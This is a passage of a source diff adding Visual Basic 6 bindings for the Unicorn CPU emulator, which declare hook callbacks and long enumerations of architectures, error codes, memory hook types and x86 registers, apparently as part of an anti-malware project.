Friend Function internal_invalid_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) As Long
    Dim addr As Long, v As Long, continue As Boolean
    addr = cur2lng(address)
    v = cur2lng(value)
    RaiseEvent InvalidMem(t, addr, size, v, continue)
    internal_invalid_mem_hook = IIf(continue, 1, 0)   '1 tells unicorn to continue emulation
End Function

Friend Sub internal_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency)
    Dim addr As Long, v As Long
    addr = cur2lng(address)
    v = cur2lng(value)
    RaiseEvent MemAccess(t, addr, size, v)
End Sub

Friend Sub
internal_code_hook(ByVal address As Currency, ByVal size As Long) + Dim addr As Long + addr = cur2lng(address) + RaiseEvent CodeHook(addr, size) +End Sub + +Friend Sub internal_block_hook(ByVal address As Currency, ByVal size As Long) + Dim addr As Long + addr = cur2lng(address) + RaiseEvent BlockHook(addr, size) +End Sub + +Friend Sub internal_interrupt_hook(ByVal intno As Long) + RaiseEvent Interrupt(intno) +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas new file mode 100644 index 0000000..823819c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas @@ -0,0 +1,2504 @@ +Attribute VB_Name = "uc_def" +Option Explicit + +'Unicorn Engine x86 32bit wrapper class for vb6 + +'Contributed by: FireEye FLARE team +'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +'License: Apache + +' supported api: +' ucs_version +' ucs_arch_supported +' ucs_open +' ucs_close +' uc_reg_write +' uc_reg_read +' uc_mem_write +' UC_MEM_READ +' uc_emu_start +' uc_emu_stop +' ucs_hook_add +' uc_mem_map +' uc_hook_del +' uc_mem_regions +' uc_mem_map_ptr +' uc_context_alloc +' uc_free +' uc_context_save +' uc_context_restore +' uc_mem_unmap +' uc_mem_protect +' uc_strerror +' uc_errno + +' supported hooks: +' UC_HOOK_CODE +' UC_HOOK_BLOCK +' memory READ/WRITE/FETCH +' invalid memory access +' interrupts +' +' bonus: +' disasm_addr (32bit only uses libdasm) +' mem_write_block (map and write data auto handles alignment) +' get_memMap (wrapper for uc_mem_regions) +' +' + +'sample supports multiple instances, required since callbacks must be in a shared module +Global instances As New Collection +Global UNICORN_PATH As String +Global DYNLOAD As Long + +Public Enum uc_arch + UC_ARCH_ARM = 1 ' ARM architecture (including Thumb, Thumb-2) + UC_ARCH_ARM64 = 2 ' ARM-64, also called AArch64 + UC_ARCH_MIPS = 3 ' Mips architecture + UC_ARCH_X86 = 4 ' X86 
architecture (including x86 & x86-64) + UC_ARCH_PPC = 5 ' PowerPC architecture (currently unsupported) + UC_ARCH_SPARC = 6 ' Sparc architecture + UC_ARCH_M68K = 7 ' M68K architecture + UC_ARCH_MAX = 8 +End Enum + +Public Enum uc_prot + UC_PROT_NONE = 0 + UC_PROT_READ = 1 + UC_PROT_WRITE = 2 + UC_PROT_EXEC = 4 + UC_PROT_ALL = 7 +End Enum + +Public Enum uc_err + uc_err_ok = 0 ' No error: everything was fine + UC_ERR_NOMEM = 1 ' Out-Of-Memory error: uc_open(), uc_emulate() + UC_ERR_ARCH = 2 ' Unsupported architecture: uc_open() + UC_ERR_HANDLE = 3 ' Invalid handle + UC_ERR_MODE = 4 ' Invalid/unsupported mode: uc_open() + UC_ERR_VERSION = 5 ' Unsupported version (bindings) + UC_ERR_READ_UNMAPPED = 6 ' Quit emulation due to READ on unmapped memory: uc_emu_start() + UC_ERR_WRITE_UNMAPPED = 7 ' Quit emulation due to WRITE on unmapped memory: uc_emu_start() + UC_ERR_FETCH_UNMAPPED = 8 ' Quit emulation due to FETCH on unmapped memory: uc_emu_start() + UC_ERR_HOOK = 9 ' Invalid hook type: uc_hook_add() + UC_ERR_INSN_INVALID = 10 ' Quit emulation due to invalid instruction: uc_emu_start() + UC_ERR_MAP = 11 ' Invalid memory mapping: uc_mem_map() + UC_ERR_WRITE_PROT = 12 ' Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() + UC_ERR_READ_PROT = 13 ' Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() + UC_ERR_FETCH_PROT = 14 ' Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() + UC_ERR_ARG = 15 ' Inavalid argument provided to uc_xxx function (See specific function API) + UC_ERR_READ_UNALIGNED = 16 ' Unaligned read + UC_ERR_WRITE_UNALIGNED = 17 ' Unaligned write + UC_ERR_FETCH_UNALIGNED = 18 ' Unaligned fetch + UC_ERR_HOOK_EXIST = 19 ' hook for this event already existed + UC_ERR_RESOURCE = 20 ' Insufficient resource: uc_emu_start() + UC_ERR_EXCEPTION = 21 ' Unhandled CPU exception +End Enum + +' All type of memory accesses for UC_HOOK_MEM_* +Public Enum uc_mem_type + UC_MEM_READ = 16 ' Memory is read from + uc_mem_write = 17 ' Memory is 
written to + UC_MEM_FETCH = 18 ' Memory is fetched + UC_MEM_READ_UNMAPPED = 19 ' Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED = 20 ' Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED = 21 ' Unmapped memory is fetched + UC_MEM_WRITE_PROT = 22 ' Write to write protected, but mapped, memory + UC_MEM_READ_PROT = 23 ' Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT = 24 ' Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER = 25 ' Memory is read from (successful access) +End Enum + +Public Enum uc_mode 'from /bindings/dotnet/common.fs + UC_MODE_LITTLE_ENDIAN = 0 'little-endian mode (default mode) + UC_MODE_BIG_ENDIAN = 1073741824 'big-endian mode +' UC_MODE_ARM = 0 'ARM mode +' UC_MODE_THUMB = 16 'THUMB mode (including Thumb-2) +' UC_MODE_MCLASS = 32 'ARM's Cortex-M series (currently unsupported) +' UC_MODE_V8 = 64 'ARMv8 A32 encodings for ARM (currently unsupported) +' UC_MODE_MICRO = 16 'MicroMips mode (currently unsupported) +' UC_MODE_MIPS3 = 32 'Mips III ISA (currently unsupported) +' UC_MODE_MIPS32R6 = 64 'Mips32r6 ISA (currently unsupported) +' UC_MODE_MIPS32 = 4 'Mips32 ISA +' UC_MODE_MIPS64 = 8 'Mips64 ISA + UC_MODE_16 = 2 '16-bit mode + UC_MODE_32 = 4 '32-bit mode + UC_MODE_64 = 8 '64-bit mode +' UC_MODE_PPC32 = 4 '32-bit mode (currently unsupported) +' UC_MODE_PPC64 = 8 '64-bit mode (currently unsupported) +' UC_MODE_QPX = 16 'Quad Processing eXtensions mode (currently unsupported) +' UC_MODE_SPARC32 = 4 '32-bit mode +' UC_MODE_SPARC64 = 8 '64-bit mode +' UC_MODE_V9 = 16 'SparcV9 mode (currently unsupported) +End Enum + +Public Enum uc_hook_type 'from /bindings/dotnet/common.fs + UC_HOOK_INTR = 1 ' Hook all interrupt/syscall events + UC_HOOK_INSN = 2 ' Hook a particular instruction + UC_HOOK_CODE = 4 ' Hook a range of code + UC_HOOK_BLOCK = 8 ' Hook basic blocks + UC_HOOK_MEM_READ_UNMAPPED = 16 ' Hook for memory read on unmapped memory + UC_HOOK_MEM_WRITE_UNMAPPED = 32 ' Hook for invalid memory write events + 
UC_HOOK_MEM_FETCH_UNMAPPED = 64 ' Hook for invalid memory fetch for execution events + UC_HOOK_MEM_READ_PROT = 128 ' Hook for memory read on read-protected memory + UC_HOOK_MEM_WRITE_PROT = 256 ' Hook for memory write on write-protected memory + UC_HOOK_MEM_FETCH_PROT = 512 ' Hook for memory fetch on non-executable memory + UC_HOOK_MEM_READ = 1024 ' Hook memory read events. + UC_HOOK_MEM_WRITE = 2048 ' Hook memory write events. + UC_HOOK_MEM_FETCH = 4096 ' Hook memory fetch for execution events + UC_HOOK_MEM_READ_AFTER = 8192 ' Hook memory read events, but only successful access.(triggered after successful read.) + UC_HOOK_MEM_UNMAPPED = 112 + UC_HOOK_MEM_PROT = 896 + UC_HOOK_MEM_READ_INVALID = 144 + UC_HOOK_MEM_WRITE_INVALID = 288 + UC_HOOK_MEM_FETCH_INVALID = 576 + UC_HOOK_MEM_INVALID = 1008 + UC_HOOK_MEM_VALID = 7168 +End Enum + +Public Enum hookCatagory + hc_code = 0 + hc_block = 1 + hc_inst = 2 + hc_int = 3 + hc_mem = 4 + hc_memInvalid = 5 +End Enum + +Public Enum uc_x86_reg + UC_X86_REG_INVALID = 0 + UC_X86_REG_AH = 1 + UC_X86_REG_AL = 2 + UC_X86_REG_AX = 3 + UC_X86_REG_BH = 4 + UC_X86_REG_Bl = 5 + UC_X86_REG_BP = 6 + UC_X86_REG_BPL = 7 + UC_X86_REG_BX = 8 + UC_X86_REG_CH = 9 + UC_X86_REG_CL = 10 + UC_X86_REG_CS = 11 + UC_X86_REG_CX = 12 + UC_X86_REG_DH = 13 + UC_X86_REG_DI = 14 + UC_X86_REG_DIL = 15 + UC_X86_REG_DL = 16 + UC_X86_REG_DS = 17 + UC_X86_REG_DX = 18 + UC_X86_REG_EAX = 19 + UC_X86_REG_EBP = 20 + UC_X86_REG_EBX = 21 + UC_X86_REG_ECX = 22 + UC_X86_REG_EDI = 23 + UC_X86_REG_EDX = 24 + UC_X86_REG_EFLAGS = 25 + UC_X86_REG_EIP = 26 + UC_X86_REG_EIZ = 27 + UC_X86_REG_ES = 28 + UC_X86_REG_ESI = 29 + UC_X86_REG_ESP = 30 + UC_X86_REG_FPSW = 31 + UC_X86_REG_FS = 32 + UC_X86_REG_GS = 33 + UC_X86_REG_IP = 34 + UC_X86_REG_RAX = 35 + UC_X86_REG_RBP = 36 + UC_X86_REG_RBX = 37 + UC_X86_REG_RCX = 38 + UC_X86_REG_RDI = 39 + UC_X86_REG_RDX = 40 + UC_X86_REG_RIP = 41 + UC_X86_REG_RIZ = 42 + UC_X86_REG_RSI = 43 + UC_X86_REG_RSP = 44 + UC_X86_REG_SI = 45 + 
UC_X86_REG_SIL = 46 + UC_X86_REG_SP = 47 + UC_X86_REG_SPL = 48 + UC_X86_REG_SS = 49 + UC_X86_REG_CR0 = 50 + UC_X86_REG_CR1 = 51 + UC_X86_REG_CR2 = 52 + UC_X86_REG_CR3 = 53 + UC_X86_REG_CR4 = 54 + UC_X86_REG_CR5 = 55 + UC_X86_REG_CR6 = 56 + UC_X86_REG_CR7 = 57 + UC_X86_REG_CR8 = 58 + UC_X86_REG_CR9 = 59 + UC_X86_REG_CR10 = 60 + UC_X86_REG_CR11 = 61 + UC_X86_REG_CR12 = 62 + UC_X86_REG_CR13 = 63 + UC_X86_REG_CR14 = 64 + UC_X86_REG_CR15 = 65 + UC_X86_REG_DR0 = 66 + UC_X86_REG_DR1 = 67 + UC_X86_REG_DR2 = 68 + UC_X86_REG_DR3 = 69 + UC_X86_REG_DR4 = 70 + UC_X86_REG_DR5 = 71 + UC_X86_REG_DR6 = 72 + UC_X86_REG_DR7 = 73 + UC_X86_REG_DR8 = 74 + UC_X86_REG_DR9 = 75 + UC_X86_REG_DR10 = 76 + UC_X86_REG_DR11 = 77 + UC_X86_REG_DR12 = 78 + UC_X86_REG_DR13 = 79 + UC_X86_REG_DR14 = 80 + UC_X86_REG_DR15 = 81 + UC_X86_REG_FP0 = 82 + UC_X86_REG_FP1 = 83 + UC_X86_REG_FP2 = 84 + UC_X86_REG_FP3 = 85 + UC_X86_REG_FP4 = 86 + UC_X86_REG_FP5 = 87 + UC_X86_REG_FP6 = 88 + UC_X86_REG_FP7 = 89 + UC_X86_REG_K0 = 90 + UC_X86_REG_K1 = 91 + UC_X86_REG_K2 = 92 + UC_X86_REG_K3 = 93 + UC_X86_REG_K4 = 94 + UC_X86_REG_K5 = 95 + UC_X86_REG_K6 = 96 + UC_X86_REG_K7 = 97 + UC_X86_REG_MM0 = 98 + UC_X86_REG_MM1 = 99 + UC_X86_REG_MM2 = 100 + UC_X86_REG_MM3 = 101 + UC_X86_REG_MM4 = 102 + UC_X86_REG_MM5 = 103 + UC_X86_REG_MM6 = 104 + UC_X86_REG_MM7 = 105 + UC_X86_REG_R8 = 106 + UC_X86_REG_R9 = 107 + UC_X86_REG_R10 = 108 + UC_X86_REG_R11 = 109 + UC_X86_REG_R12 = 110 + UC_X86_REG_R13 = 111 + UC_X86_REG_R14 = 112 + UC_X86_REG_R15 = 113 + UC_X86_REG_ST0 = 114 + UC_X86_REG_ST1 = 115 + UC_X86_REG_ST2 = 116 + UC_X86_REG_ST3 = 117 + UC_X86_REG_ST4 = 118 + UC_X86_REG_ST5 = 119 + UC_X86_REG_ST6 = 120 + UC_X86_REG_ST7 = 121 + UC_X86_REG_XMM0 = 122 + UC_X86_REG_XMM1 = 123 + UC_X86_REG_XMM2 = 124 + UC_X86_REG_XMM3 = 125 + UC_X86_REG_XMM4 = 126 + UC_X86_REG_XMM5 = 127 + UC_X86_REG_XMM6 = 128 + UC_X86_REG_XMM7 = 129 + UC_X86_REG_XMM8 = 130 + UC_X86_REG_XMM9 = 131 + UC_X86_REG_XMM10 = 132 + UC_X86_REG_XMM11 = 133 + 
UC_X86_REG_XMM12 = 134 + UC_X86_REG_XMM13 = 135 + UC_X86_REG_XMM14 = 136 + UC_X86_REG_XMM15 = 137 + UC_X86_REG_XMM16 = 138 + UC_X86_REG_XMM17 = 139 + UC_X86_REG_XMM18 = 140 + UC_X86_REG_XMM19 = 141 + UC_X86_REG_XMM20 = 142 + UC_X86_REG_XMM21 = 143 + UC_X86_REG_XMM22 = 144 + UC_X86_REG_XMM23 = 145 + UC_X86_REG_XMM24 = 146 + UC_X86_REG_XMM25 = 147 + UC_X86_REG_XMM26 = 148 + UC_X86_REG_XMM27 = 149 + UC_X86_REG_XMM28 = 150 + UC_X86_REG_XMM29 = 151 + UC_X86_REG_XMM30 = 152 + UC_X86_REG_XMM31 = 153 + UC_X86_REG_YMM0 = 154 + UC_X86_REG_YMM1 = 155 + UC_X86_REG_YMM2 = 156 + UC_X86_REG_YMM3 = 157 + UC_X86_REG_YMM4 = 158 + UC_X86_REG_YMM5 = 159 + UC_X86_REG_YMM6 = 160 + UC_X86_REG_YMM7 = 161 + UC_X86_REG_YMM8 = 162 + UC_X86_REG_YMM9 = 163 + UC_X86_REG_YMM10 = 164 + UC_X86_REG_YMM11 = 165 + UC_X86_REG_YMM12 = 166 + UC_X86_REG_YMM13 = 167 + UC_X86_REG_YMM14 = 168 + UC_X86_REG_YMM15 = 169 + UC_X86_REG_YMM16 = 170 + UC_X86_REG_YMM17 = 171 + UC_X86_REG_YMM18 = 172 + UC_X86_REG_YMM19 = 173 + UC_X86_REG_YMM20 = 174 + UC_X86_REG_YMM21 = 175 + UC_X86_REG_YMM22 = 176 + UC_X86_REG_YMM23 = 177 + UC_X86_REG_YMM24 = 178 + UC_X86_REG_YMM25 = 179 + UC_X86_REG_YMM26 = 180 + UC_X86_REG_YMM27 = 181 + UC_X86_REG_YMM28 = 182 + UC_X86_REG_YMM29 = 183 + UC_X86_REG_YMM30 = 184 + UC_X86_REG_YMM31 = 185 + UC_X86_REG_ZMM0 = 186 + UC_X86_REG_ZMM1 = 187 + UC_X86_REG_ZMM2 = 188 + UC_X86_REG_ZMM3 = 189 + UC_X86_REG_ZMM4 = 190 + UC_X86_REG_ZMM5 = 191 + UC_X86_REG_ZMM6 = 192 + UC_X86_REG_ZMM7 = 193 + UC_X86_REG_ZMM8 = 194 + UC_X86_REG_ZMM9 = 195 + UC_X86_REG_ZMM10 = 196 + UC_X86_REG_ZMM11 = 197 + UC_X86_REG_ZMM12 = 198 + UC_X86_REG_ZMM13 = 199 + UC_X86_REG_ZMM14 = 200 + UC_X86_REG_ZMM15 = 201 + UC_X86_REG_ZMM16 = 202 + UC_X86_REG_ZMM17 = 203 + UC_X86_REG_ZMM18 = 204 + UC_X86_REG_ZMM19 = 205 + UC_X86_REG_ZMM20 = 206 + UC_X86_REG_ZMM21 = 207 + UC_X86_REG_ZMM22 = 208 + UC_X86_REG_ZMM23 = 209 + UC_X86_REG_ZMM24 = 210 + UC_X86_REG_ZMM25 = 211 + UC_X86_REG_ZMM26 = 212 + UC_X86_REG_ZMM27 = 213 + UC_X86_REG_ZMM28 = 
214 + UC_X86_REG_ZMM29 = 215 + UC_X86_REG_ZMM30 = 216 + UC_X86_REG_ZMM31 = 217 + UC_X86_REG_R8B = 218 + UC_X86_REG_R9B = 219 + UC_X86_REG_R10B = 220 + UC_X86_REG_R11B = 221 + UC_X86_REG_R12B = 222 + UC_X86_REG_R13B = 223 + UC_X86_REG_R14B = 224 + UC_X86_REG_R15B = 225 + UC_X86_REG_R8D = 226 + UC_X86_REG_R9D = 227 + UC_X86_REG_R10D = 228 + UC_X86_REG_R11D = 229 + UC_X86_REG_R12D = 230 + UC_X86_REG_R13D = 231 + UC_X86_REG_R14D = 232 + UC_X86_REG_R15D = 233 + UC_X86_REG_R8W = 234 + UC_X86_REG_R9W = 235 + UC_X86_REG_R10W = 236 + UC_X86_REG_R11W = 237 + UC_X86_REG_R12W = 238 + UC_X86_REG_R13W = 239 + UC_X86_REG_R14W = 240 + UC_X86_REG_R15W = 241 + UC_X86_REG_IDTR = 242 + UC_X86_REG_GDTR = 243 + UC_X86_REG_LDTR = 244 + UC_X86_REG_TR = 245 + UC_X86_REG_FPCW = 246 + UC_X86_REG_FPTAG = 247 + UC_X86_REG_ENDING = 248 +End Enum + +'Public Enum uc_x86_insn +' UC_X86_INS_INVALID = 0 +' UC_X86_INS_AAA = 1 +' UC_X86_INS_AAD = 2 +' UC_X86_INS_AAM = 3 +' UC_X86_INS_AAS = 4 +' UC_X86_INS_FABS = 5 +' UC_X86_INS_ADC = 6 +' UC_X86_INS_ADCX = 7 +' UC_X86_INS_ADD = 8 +' UC_X86_INS_ADDPD = 9 +' UC_X86_INS_ADDPS = 10 +' UC_X86_INS_ADDSD = 11 +' UC_X86_INS_ADDSS = 12 +' UC_X86_INS_ADDSUBPD = 13 +' UC_X86_INS_ADDSUBPS = 14 +' UC_X86_INS_FADD = 15 +' UC_X86_INS_FIADD = 16 +' UC_X86_INS_FADDP = 17 +' UC_X86_INS_ADOX = 18 +' UC_X86_INS_AESDECLAST = 19 +' UC_X86_INS_AESDEC = 20 +' UC_X86_INS_AESENCLAST = 21 +' UC_X86_INS_AESENC = 22 +' UC_X86_INS_AESIMC = 23 +' UC_X86_INS_AESKEYGENASSIST = 24 +' UC_X86_INS_AND = 25 +' UC_X86_INS_ANDN = 26 +' UC_X86_INS_ANDNPD = 27 +' UC_X86_INS_ANDNPS = 28 +' UC_X86_INS_ANDPD = 29 +' UC_X86_INS_ANDPS = 30 +' UC_X86_INS_ARPL = 31 +' UC_X86_INS_BEXTR = 32 +' UC_X86_INS_BLCFILL = 33 +' UC_X86_INS_BLCI = 34 +' UC_X86_INS_BLCIC = 35 +' UC_X86_INS_BLCMSK = 36 +' UC_X86_INS_BLCS = 37 +' UC_X86_INS_BLENDPD = 38 +' UC_X86_INS_BLENDPS = 39 +' UC_X86_INS_BLENDVPD = 40 +' UC_X86_INS_BLENDVPS = 41 +' UC_X86_INS_BLSFILL = 42 +' UC_X86_INS_BLSI = 43 +' UC_X86_INS_BLSIC = 44 +' 
UC_X86_INS_BLSMSK = 45 +' UC_X86_INS_BLSR = 46 +' UC_X86_INS_BOUND = 47 +' UC_X86_INS_BSF = 48 +' UC_X86_INS_BSR = 49 +' UC_X86_INS_BSWAP = 50 +' UC_X86_INS_BT = 51 +' UC_X86_INS_BTC = 52 +' UC_X86_INS_BTR = 53 +' UC_X86_INS_BTS = 54 +' UC_X86_INS_BZHI = 55 +' UC_X86_INS_CALL = 56 +' UC_X86_INS_CBW = 57 +' UC_X86_INS_CDQ = 58 +' UC_X86_INS_CDQE = 59 +' UC_X86_INS_FCHS = 60 +' UC_X86_INS_CLAC = 61 +' UC_X86_INS_CLC = 62 +' UC_X86_INS_CLD = 63 +' UC_X86_INS_CLFLUSH = 64 +' UC_X86_INS_CLFLUSHOPT = 65 +' UC_X86_INS_CLGI = 66 +' UC_X86_INS_CLI = 67 +' UC_X86_INS_CLTS = 68 +' UC_X86_INS_CLWB = 69 +' UC_X86_INS_CMC = 70 +' UC_X86_INS_CMOVA = 71 +' UC_X86_INS_CMOVAE = 72 +' UC_X86_INS_CMOVB = 73 +' UC_X86_INS_CMOVBE = 74 +' UC_X86_INS_FCMOVBE = 75 +' UC_X86_INS_FCMOVB = 76 +' UC_X86_INS_CMOVE = 77 +' UC_X86_INS_FCMOVE = 78 +' UC_X86_INS_CMOVG = 79 +' UC_X86_INS_CMOVGE = 80 +' UC_X86_INS_CMOVL = 81 +' UC_X86_INS_CMOVLE = 82 +' UC_X86_INS_FCMOVNBE = 83 +' UC_X86_INS_FCMOVNB = 84 +' UC_X86_INS_CMOVNE = 85 +' UC_X86_INS_FCMOVNE = 86 +' UC_X86_INS_CMOVNO = 87 +' UC_X86_INS_CMOVNP = 88 +' UC_X86_INS_FCMOVNU = 89 +' UC_X86_INS_CMOVNS = 90 +' UC_X86_INS_CMOVO = 91 +' UC_X86_INS_CMOVP = 92 +' UC_X86_INS_FCMOVU = 93 +' UC_X86_INS_CMOVS = 94 +' UC_X86_INS_CMP = 95 +' UC_X86_INS_CMPPD = 96 +' UC_X86_INS_CMPPS = 97 +' UC_X86_INS_CMPSB = 98 +' UC_X86_INS_CMPSD = 99 +' UC_X86_INS_CMPSQ = 100 +' UC_X86_INS_CMPSS = 101 +' UC_X86_INS_CMPSW = 102 +' UC_X86_INS_CMPXCHG16B = 103 +' UC_X86_INS_CMPXCHG = 104 +' UC_X86_INS_CMPXCHG8B = 105 +' UC_X86_INS_COMISD = 106 +' UC_X86_INS_COMISS = 107 +' UC_X86_INS_FCOMP = 108 +' UC_X86_INS_FCOMPI = 109 +' UC_X86_INS_FCOMI = 110 +' UC_X86_INS_FCOM = 111 +' UC_X86_INS_FCOS = 112 +' UC_X86_INS_CPUID = 113 +' UC_X86_INS_CQO = 114 +' UC_X86_INS_CRC32 = 115 +' UC_X86_INS_CVTDQ2PD = 116 +' UC_X86_INS_CVTDQ2PS = 117 +' UC_X86_INS_CVTPD2DQ = 118 +' UC_X86_INS_CVTPD2PS = 119 +' UC_X86_INS_CVTPS2DQ = 120 +' UC_X86_INS_CVTPS2PD = 121 +' UC_X86_INS_CVTSD2SI = 122 +' 
UC_X86_INS_CVTSD2SS = 123 +' UC_X86_INS_CVTSI2SD = 124 +' UC_X86_INS_CVTSI2SS = 125 +' UC_X86_INS_CVTSS2SD = 126 +' UC_X86_INS_CVTSS2SI = 127 +' UC_X86_INS_CVTTPD2DQ = 128 +' UC_X86_INS_CVTTPS2DQ = 129 +' UC_X86_INS_CVTTSD2SI = 130 +' UC_X86_INS_CVTTSS2SI = 131 +' UC_X86_INS_CWD = 132 +' UC_X86_INS_CWDE = 133 +' UC_X86_INS_DAA = 134 +' UC_X86_INS_DAS = 135 +' UC_X86_INS_DATA16 = 136 +' UC_X86_INS_DEC = 137 +' UC_X86_INS_DIV = 138 +' UC_X86_INS_DIVPD = 139 +' UC_X86_INS_DIVPS = 140 +' UC_X86_INS_FDIVR = 141 +' UC_X86_INS_FIDIVR = 142 +' UC_X86_INS_FDIVRP = 143 +' UC_X86_INS_DIVSD = 144 +' UC_X86_INS_DIVSS = 145 +' UC_X86_INS_FDIV = 146 +' UC_X86_INS_FIDIV = 147 +' UC_X86_INS_FDIVP = 148 +' UC_X86_INS_DPPD = 149 +' UC_X86_INS_DPPS = 150 +' UC_X86_INS_RET = 151 +' UC_X86_INS_ENCLS = 152 +' UC_X86_INS_ENCLU = 153 +' UC_X86_INS_ENTER = 154 +' UC_X86_INS_EXTRACTPS = 155 +' UC_X86_INS_EXTRQ = 156 +' UC_X86_INS_F2XM1 = 157 +' UC_X86_INS_LCALL = 158 +' UC_X86_INS_LJMP = 159 +' UC_X86_INS_FBLD = 160 +' UC_X86_INS_FBSTP = 161 +' UC_X86_INS_FCOMPP = 162 +' UC_X86_INS_FDECSTP = 163 +' UC_X86_INS_FEMMS = 164 +' UC_X86_INS_FFREE = 165 +' UC_X86_INS_FICOM = 166 +' UC_X86_INS_FICOMP = 167 +' UC_X86_INS_FINCSTP = 168 +' UC_X86_INS_FLDCW = 169 +' UC_X86_INS_FLDENV = 170 +' UC_X86_INS_FLDL2E = 171 +' UC_X86_INS_FLDL2T = 172 +' UC_X86_INS_FLDLG2 = 173 +' UC_X86_INS_FLDLN2 = 174 +' UC_X86_INS_FLDPI = 175 +' UC_X86_INS_FNCLEX = 176 +' UC_X86_INS_FNINIT = 177 +' UC_X86_INS_FNOP = 178 +' UC_X86_INS_FNSTCW = 179 +' UC_X86_INS_FNSTSW = 180 +' UC_X86_INS_FPATAN = 181 +' UC_X86_INS_FPREM = 182 +' UC_X86_INS_FPREM1 = 183 +' UC_X86_INS_FPTAN = 184 +' UC_X86_INS_FFREEP = 185 +' UC_X86_INS_FRNDINT = 186 +' UC_X86_INS_FRSTOR = 187 +' UC_X86_INS_FNSAVE = 188 +' UC_X86_INS_FSCALE = 189 +' UC_X86_INS_FSETPM = 190 +' UC_X86_INS_FSINCOS = 191 +' UC_X86_INS_FNSTENV = 192 +' UC_X86_INS_FXAM = 193 +' UC_X86_INS_FXRSTOR = 194 +' UC_X86_INS_FXRSTOR64 = 195 +' UC_X86_INS_FXSAVE = 196 +' UC_X86_INS_FXSAVE64 = 
197 +' UC_X86_INS_FXTRACT = 198 +' UC_X86_INS_FYL2X = 199 +' UC_X86_INS_FYL2XP1 = 200 +' UC_X86_INS_MOVAPD = 201 +' UC_X86_INS_MOVAPS = 202 +' UC_X86_INS_ORPD = 203 +' UC_X86_INS_ORPS = 204 +' UC_X86_INS_VMOVAPD = 205 +' UC_X86_INS_VMOVAPS = 206 +' UC_X86_INS_XORPD = 207 +' UC_X86_INS_XORPS = 208 +' UC_X86_INS_GETSEC = 209 +' UC_X86_INS_HADDPD = 210 +' UC_X86_INS_HADDPS = 211 +' UC_X86_INS_HLT = 212 +' UC_X86_INS_HSUBPD = 213 +' UC_X86_INS_HSUBPS = 214 +' UC_X86_INS_IDIV = 215 +' UC_X86_INS_FILD = 216 +' UC_X86_INS_IMUL = 217 +' UC_X86_INS_IN = 218 +' UC_X86_INS_INC = 219 +' UC_X86_INS_INSB = 220 +' UC_X86_INS_INSERTPS = 221 +' UC_X86_INS_INSERTQ = 222 +' UC_X86_INS_INSD = 223 +' UC_X86_INS_INSW = 224 +' UC_X86_INS_INT = 225 +' UC_X86_INS_INT1 = 226 +' UC_X86_INS_INT3 = 227 +' UC_X86_INS_INTO = 228 +' UC_X86_INS_INVD = 229 +' UC_X86_INS_INVEPT = 230 +' UC_X86_INS_INVLPG = 231 +' UC_X86_INS_INVLPGA = 232 +' UC_X86_INS_INVPCID = 233 +' UC_X86_INS_INVVPID = 234 +' UC_X86_INS_IRET = 235 +' UC_X86_INS_IRETD = 236 +' UC_X86_INS_IRETQ = 237 +' UC_X86_INS_FISTTP = 238 +' UC_X86_INS_FIST = 239 +' UC_X86_INS_FISTP = 240 +' UC_X86_INS_UCOMISD = 241 +' UC_X86_INS_UCOMISS = 242 +' UC_X86_INS_VCOMISD = 243 +' UC_X86_INS_VCOMISS = 244 +' UC_X86_INS_VCVTSD2SS = 245 +' UC_X86_INS_VCVTSI2SD = 246 +' UC_X86_INS_VCVTSI2SS = 247 +' UC_X86_INS_VCVTSS2SD = 248 +' UC_X86_INS_VCVTTSD2SI = 249 +' UC_X86_INS_VCVTTSD2USI = 250 +' UC_X86_INS_VCVTTSS2SI = 251 +' UC_X86_INS_VCVTTSS2USI = 252 +' UC_X86_INS_VCVTUSI2SD = 253 +' UC_X86_INS_VCVTUSI2SS = 254 +' UC_X86_INS_VUCOMISD = 255 +' UC_X86_INS_VUCOMISS = 256 +' UC_X86_INS_JAE = 257 +' UC_X86_INS_JA = 258 +' UC_X86_INS_JBE = 259 +' UC_X86_INS_JB = 260 +' UC_X86_INS_JCXZ = 261 +' UC_X86_INS_JECXZ = 262 +' UC_X86_INS_JE = 263 +' UC_X86_INS_JGE = 264 +' UC_X86_INS_JG = 265 +' UC_X86_INS_JLE = 266 +' UC_X86_INS_JL = 267 +' UC_X86_INS_JMP = 268 +' UC_X86_INS_JNE = 269 +' UC_X86_INS_JNO = 270 +' UC_X86_INS_JNP = 271 +' UC_X86_INS_JNS = 272 +' 
UC_X86_INS_JO = 273 +' UC_X86_INS_JP = 274 +' UC_X86_INS_JRCXZ = 275 +' UC_X86_INS_JS = 276 +' UC_X86_INS_KANDB = 277 +' UC_X86_INS_KANDD = 278 +' UC_X86_INS_KANDNB = 279 +' UC_X86_INS_KANDND = 280 +' UC_X86_INS_KANDNQ = 281 +' UC_X86_INS_KANDNW = 282 +' UC_X86_INS_KANDQ = 283 +' UC_X86_INS_KANDW = 284 +' UC_X86_INS_KMOVB = 285 +' UC_X86_INS_KMOVD = 286 +' UC_X86_INS_KMOVQ = 287 +' UC_X86_INS_KMOVW = 288 +' UC_X86_INS_KNOTB = 289 +' UC_X86_INS_KNOTD = 290 +' UC_X86_INS_KNOTQ = 291 +' UC_X86_INS_KNOTW = 292 +' UC_X86_INS_KORB = 293 +' UC_X86_INS_KORD = 294 +' UC_X86_INS_KORQ = 295 +' UC_X86_INS_KORTESTB = 296 +' UC_X86_INS_KORTESTD = 297 +' UC_X86_INS_KORTESTQ = 298 +' UC_X86_INS_KORTESTW = 299 +' UC_X86_INS_KORW = 300 +' UC_X86_INS_KSHIFTLB = 301 +' UC_X86_INS_KSHIFTLD = 302 +' UC_X86_INS_KSHIFTLQ = 303 +' UC_X86_INS_KSHIFTLW = 304 +' UC_X86_INS_KSHIFTRB = 305 +' 